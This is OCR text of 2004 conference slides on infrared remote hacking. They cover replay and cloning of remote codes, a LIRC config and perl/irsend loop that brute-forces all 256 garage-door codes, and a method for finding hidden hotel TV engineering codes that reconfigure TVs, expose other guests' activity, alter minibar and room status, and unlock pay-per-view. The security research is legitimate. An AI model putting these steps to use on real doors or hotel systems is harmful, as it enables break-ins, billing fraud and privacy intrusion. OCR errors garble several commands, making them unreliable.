Introduction 


■  Why  Infra  Red? 


Ubiquitous  -  still  used  in  modern  applications 

*  TV  /  Cable  /  Sat  remotes 

Master  configuration  /  Tuning 

Package  selection 

Central  control  /  Billing 
•*  Vending  machines 

Price  changes 

On /Off  duty 

►  Public  display  signs 

Message  programming 
Master  configuration 
*■  Garage  door  openers 

►  Car  alarm  systems  /  Central  locking 

►  Air  conditioning 


Introduction 


■  Why  MMIrDA? 

•  'Major  Malfunction's  Infra  Red  Discovery  Application1 

•  Built  in  IrDA  Serial  port  on  laptops 


•  Originally  intended  to  write  a  tool  for  FreeBSD,  but  found  LIRC  and 
other  tools  already  existed  under  Linux 


Introduction 


■  Why  Bother? 


•  IR  unlikely  to  be  replaced 

*  Fit  for  use 

►  Cheap 

►  Simple 

►  If  it  aint  broke,  dont  fix  it! 


Because  it's  there! 

*■  Good  skills 

►  Practice  your  art 

►  Know  your  enemy 


IR  is  the  ultimate  in  'security  by  obscurity' 

►  Invisible  rays  hide  a  multitude  of  sins 
Simple  codes 

►  Total  control 

>-  Inverted  security  model 


Simple  Replay  Attacks 


Record  codes  and  retransmit 


Early  Car  Alarms 


Garage  Doors 


Toys  -  RoboSapien 


Standard  TVs 


Bars,  Clubs  etc. 


Clone  'special'  remotes 


Cloning  /  Replay  Tools 


Learning  remotes 


Casio  IR  Watches 
Apple  Newton 
Omni  Remote 

*  PalmOS 
+  Dev  library 
►  http://www.pacificneotek.com/ 


Philips  Pronto 

►  Human  readable  (Hex) 

►  http:/AA/ww.remotecentral.com/ 

►  Pronto  tools 


Brute  Force  Attacks 


■  Record  codes,  analyse  and  infer 

•  Garage  Doors 

•  TVs  H| 

•  Cars 


Brute  Force  Tools 


•  http://www.lirc.org/ 

*  Visualisation  tools 

►  Auto  learning 

►  ASCII  /  Human  readable  config 

►  Software  only  with  laptop  IR  port 

►  Linux  only 


iRTrans 


http://www.irtrans.de/ 

►  More  powerful  transmitter 

-  Solves  PC  timing  issues 

-  Works  with  more  targets 
*  Serial  or  USB 

►  Linux  or  that  other  popular  0/S 


Garage  Door  Openers 


Simple  code,  manually  configurable 


Dipswitch  with  8  on  /  off  bits  =  256  possible  codes 
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Garage  Door  Openers 


Analysing  data  bits  with  ,xmode2' 


x  mode  2 
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»  1-7  off,  8  on 


S00000001  ssss 


Garage  Door  Openers 


begin  remote 
name  garage 

bits  12 

one         214  558 

zero        214  259 

toggle_bit  0 


0x0000000000000000 
0x0000000000000001 
0x0000000000000080 
0x00000000000000e3 
OxOOOOOOOOOOOOOOff 


begin  codes 


80 
e3 
ff 


end  codes 
end  remote 


Garage  Door  Openers 


m  Now  fill  in  the  gaps 


perl  -e  Tor  (1  ..255)  { printff  %02x\t\t0x%016x\n", $_,$_) }' 


0x0000000000000001 
0x0000000000000002 
0x0000000000000003 
0x0000000000000004 
0x0000000000000005 
0x0000000000000006 
0x0000000000000007 
0x0000000000000008 
0x0000000000000009 
0x000000000000000a 
0x000000000000000b 


Garage  Door  Openers 


■  Send  all  possible  codes 


for  i  in  perl  -e  for  (0..255)  {  printf("%02x\n",$J }'  ;  do  irsend  SENDJDNCE  garage  $i ;  done 


irsend  SEND_ONCE  garage  00 
irsend  SENDJDNCE  garage  01 
irsend  SENDJDNCE  garage  02 
irsend  SENDJDNCE  garage  03 
irsend  SENDJDNCE  garage  04 
irsend  SENDJDNCE  garage  05 
irsend  SENDJDNCE  garage  06 
irsend  SENDJDNCE  garage  07 


TV 


■  More  complex  codes  (more  bits) 


TV 


■  More  complex  codes  (more  bits) 


•  Manufacturer  collision  avoidance 


Groups  of  codes  use  different  bits 

►  Multiple  device  types  on  single  remote 

TV 
Video 
Sat /Cable 

►  Standard 

Channel  select 
Menu 
Motion 
Teletext 
Extra 

Alarm  clock 
Pay  TV 
Checkout 
*■  Hidden 


TV 


■  Hidden  codes 


Hotel  internal  (housekeeping)  daily  tasks 

-  Minibar  billing 

»-  Room  cleaning  /  status  reports 


Extras  (engineering)  one-off  tasks 

p  Pay  TV  config 
-  Debugging 

Cable  codes 

Signal  strength 

Port  settings 
>  Accessory  /  Service  (Deactivation 


oiesvstemmMlesinobelegt 

BITTTVERSUCHEII^es 
SPATER  NOCMVIlBi*. 


TV  -  Discovering  hidden  codes 


Reducing  the  search  space  -  Standard  group 


14  bit  code  =  16,384  possible  codes 


[REMOTE] 
[NAME]hotel 


[COMMANDS] 
[0][T]0[D]1 
[1][T]0[D]1 
[2][T]0[D]1 
[3][T]0[D]1 

[4][T]0[D]1 
[5][T]0[D]1 
[6][T]0[D]1 
[7][T]0[D]1 

[8][T]0[D]1 
[9][T]0[D]1 


1000000000000 
1000000000001 
1000000000010 
1000000000011 
1000000000100 
1000000000101 
1000000000110 
1000000000111 
1000000001000 
1000000001001 


•  Bits  used  so  far:  xx  xxxx 


TV  -  Discovering  hidden  codes 


[power][T]0[D]1 1 000000001 1 00 
[mute][T]0[D]1 1000000001 101 
[vol+][T]0[D]1 1000000010000 
[vol-][T]0[D]1 1000000010001 
[prog+][T]0[D]1 1 0000001 00000 
[prog-][T]0[D]1 1 0000001 00001 
[audio][T]0[D]1 10000001 0001 1 
[sleep][T]0[D]1 1 0000001 001 1 0 
[text][T]0[D]11000000111100 
[up][T]0[D]1 000000001 0000 


space  -  Standard  group 


IdOWnJlTJO  [U\ 1 00000000 1 000 1 
[menu][T]0[D]1 000000001 001 0 

[left]rn0[D]1 000000001 0101 
[right][T]0[D]1 000000001 0110 

[ok][T]0[D]1 000000001 0111 


•  Bits  used  so  far:  xx  xxxxxx 


TV  -  Discovering  hidden  codes 


Reducing  the  search  space  -  Extra  group 


[smart][T]0[D]1 1 00001 1 001 01 0 
[paytv+][T]0[D]1 1 00001 1 01 1 1 00 
[paytv-][T]0[D]1 1 00001 1011101 
[radio+][T]0[D]1 1 00001 1011110 
[radio-][T]0[D]1 1 00001 1 011111 
[info+][T]0[D]1 0000011001101 
[infb-][T]0[D]1 000001 1 001 1 1 0 
[message][T]0[D]1 000001 1 001 01 0 
[alarmon][T]0[D]1 000001 1 1 01 000 
[alarmoff][T]0[D]1 000001 1 1 01 001 

•  Bits  used  so  far:  xx — xxxxxxxx 


first  2  bits  used 
4  bits  unknown 
main  code  in  last  8  bits 


TV  -  Discovering  hidden  codes 


■  Reducing  the  search  space  -  Eliminate  unused  bits 


•  Toggle  single  bit  on  a  standard  command 

[power][T]0[D]1 1000000001 100  -  Original 


[power][T]0[D]0 1 000000001 1 00 

? 

-X — xxxxxxxx 

[power][T]0[D]1 0000000001 1 00 

? 

-X — xxxxxxxx 

[power][T]0[D]1 1 1 00000001 1 00 

? 

-X — xxxxxxxx 

[power][T]0[D]1 1 01 0000001 1 00 

? 


-  Command  succeeds 


-  Command  fails 


-  Command  succeeds 


-x — xxxxxxxx 


-  Command  succeeds 


TV  -  Discovering  hidden  codes 


Reducing  the  search  space  -  Eliminate  unused  bits 


Toggle  single  bit  on  a  standard  command 


[power][T]0[D]1 1001000001 100 

? 

-X — xxxxxxxx 
[power][T]0[D]1 1 0001 00001 1 00 


-  Command  succeeds 


-X — xxxxxxxxx 


-  Command  fails 


I 


Assumption:  bits  1 ,  3,  4,  5  ignored 
Search  space:  bits  2,  5-13  (10  bits)  =  1 ,024  possible  codes 


TV  -  Discovering  hidden  codes 


■  For  each  lead-in  pattern 


•  Create  config 


perl  -e  for  (0..255)  { printff  [%03d][T]0[D]1 00001  %s\n",$_,unpack("B8n,pack{nin,$_+0))) }' »  hotel.rem 
perl  -e  for  (0..255)  { printf("  [%03d][T]0[D]100010%s\n,,J$_,unpack(,,B8,,,pack(Hi,,,$_+0))) }' »  hotel.rem 

•  Manual  test  /  observation 


for  i  in  'perl  -e  for  (0..255)  { printf("%03d\nH,$  J ;  do  echo  -n  "$L." ;  irtrans  localhost  hotel  $i ;  echo 
"done" ;  sleep  2  ;  done 


■  *  ■ 


Rinse,  repeat 


■ 


TV  -  Discovering  hidden  codes 


-  Profit! 


0000100110000 
0000111011010 
1000100111110 
1000110111110 
1000101111111 
1000101101011 
1000101111010 
1000101111101 
1000111001111 
1000111010110 
0000111010010 
1000111101110 


#  engineering 

#  engineering 

#  engineering 

#  disable  spoiler  signal  /  computer 

#  housekeeping 

#  housekeeping 

#  engineering 

#  bingo!  this  TV  is  0wn3d 


TV  -  New  Capabilities 


■  Reconfigure  TV 

•  Change  messages 

•  Assign  to  another  room 

•  Assign  new  free  channels 

•  Find  new  channels 
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TV  -  New  Capabilities 


View  back-end  systems 
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TV  INSTALLATION 
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TV  -  New  Capabilities 

■  View  other  users  activities 
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TV  INSTALLATION 
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TV  -  New  Capabilities 


Change  Room  status 


Cleaning 


Minibar 


TV  -  Pay  per  view 


Movies  On  demand 


Controller  requests  movie  to  start  &  assigns  channel 


Cyclic  or  Fixed  Start  Times 


Controller  retunes  TV 


Controller  routes  selected  channel  to  AV 


Controller  switches  off  blocking  signal 
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Hollywood  Movies 


Adult  Features 
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Future  Projects 


■  Car  Alarm  /  Central  Locking 


•  Moving  towards  radio 


•  Likely  to  be  carrier  technology  change  only 

►  LIRC  style  receiver  /  transmitter  possible 


Rolling  codes 


■ 


Next  code  must  be  within  range  window 

>  Hex  codes  reveal  attack  range? 


Crypto  component? 


Questions  /  Feedback 


21 C3  Berlin  2004 


■  Contact: 


•  majormal@pirate-radio.org 


Thank  You 


